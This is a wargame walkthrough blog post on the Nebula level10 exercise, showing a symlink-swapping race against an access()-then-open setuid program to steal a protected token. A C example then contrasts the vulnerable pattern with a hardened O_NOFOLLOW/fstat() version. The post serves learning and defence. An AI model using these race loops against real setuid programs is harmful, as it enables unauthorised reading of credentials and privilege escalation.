Thursday, June 30, 2016

Exploit Exercises - nebula level10

Researching the access() requirements, we find this:

The level10 directory contains a file, x, which holds the token (the password for flag10). It shouldn't be there, so we need a way to transfer the token file.

We don't have read access to the token.

We will need to exploit a race condition in the program's use of access() calls:

Checking how flag10 works normally:

The following steps are needed to exploit the access() race condition:

  1. Create a fake token file - echo fake_token > /tmp/fake_token
  2. Create a soft link to our fake token - ln -sf /tmp/fake_token token
  3. Create a soft link to the real token with the same name - ln -s /home/flag10/token token
  4. Execute steps 2 and 3 in a loop - while true; do ln -fs /tmp/fake_token token; ln -fs /home/flag10/token token; done
  5. Execute the file transfer in a loop - while true; do /home/flag10/flag10 token; done

The token is transferred successfully. Use it to log in as flag10 and run getflag.
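The race works only because the program checks the path with access() and then opens the same name in a separate call, leaving a window in which the symlink can be re-pointed. The C below is an added illustration, not code from this post or from the Nebula flag10 binary (whose source the post does not show): it places the generic check-then-open pattern beside a hardened version that opens first with O_NOFOLLOW and then verifies the object it actually holds with fstat(). The file names, the expected-owner parameter and the demo helpers are constructed for the example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Weak pattern (the kind of code an access() race targets): the check
 * and the use are two separate path lookups, so whatever the name
 * resolves to can change between them.
 */
int open_check_then_open(const char *path)
{
    if (access(path, R_OK) != 0)      /* check: permission of the real uid */
        return -1;
    return open(path, O_RDONLY);      /* use: a second lookup of the same name */
}

/*
 * Hardened pattern: open first, refusing to follow a symlink at the final
 * path component, then validate the object actually held via fstat() on
 * the descriptor. Both steps apply to the same open file, so there is no
 * window between check and use.
 */
int open_verified(const char *path, uid_t expected_owner)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;                    /* ELOOP when the final component is a symlink */

    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != expected_owner) {
        close(fd);
        errno = EACCES;
        return -1;
    }
    return fd;
}

/* Constructed scenario: a regular temp file owned by the caller (demo helper). */
static int make_temp_file(char *path, size_t len)
{
    snprintf(path, len, "/tmp/toctou_demo_XXXXXX");
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    if (write(fd, "demo token\n", 11) != 11) {
        close(fd);
        unlink(path);
        return -1;
    }
    close(fd);
    return 0;
}

/* Returns 1 if the hardened open accepts a regular file we own. */
int demo_regular_file_accepted(void)
{
    char path[64];
    if (make_temp_file(path, sizeof path) != 0)
        return 0;
    int fd = open_verified(path, getuid());
    int ok = fd >= 0;
    if (fd >= 0)
        close(fd);
    unlink(path);
    return ok;
}

/* Returns 1 if the hardened open rejects a symlink to that file while the
 * check-then-open version follows it. */
int demo_symlink_rejected(void)
{
    char path[64], link[80];
    if (make_temp_file(path, sizeof path) != 0)
        return 0;
    snprintf(link, sizeof link, "%s.lnk", path);
    if (symlink(path, link) != 0) {
        unlink(path);
        return 0;
    }
    int fd_weak = open_check_then_open(link);    /* follows the link */
    int fd_hard = open_verified(link, getuid());  /* refuses with ELOOP */
    int ok = (fd_weak >= 0) && (fd_hard < 0);
    if (fd_weak >= 0)
        close(fd_weak);
    if (fd_hard >= 0)
        close(fd_hard);
    unlink(link);
    unlink(path);
    return ok;
}

int main(void)
{
    printf("regular file accepted: %d\n", demo_regular_file_accepted());
    printf("symlink rejected:      %d\n", demo_symlink_rejected());
    return 0;
}
```

In a setuid program the more complete fix is to drop privileges (for example setresuid() to the real uid) before the open, so the kernel performs the permission check on the object it actually opens; the fstat() ownership check above is the second layer, confirming that the descriptor refers to a regular file owned by the expected user. O_NOFOLLOW only protects the final path component, so directories earlier in the path still need to be trusted or also validated.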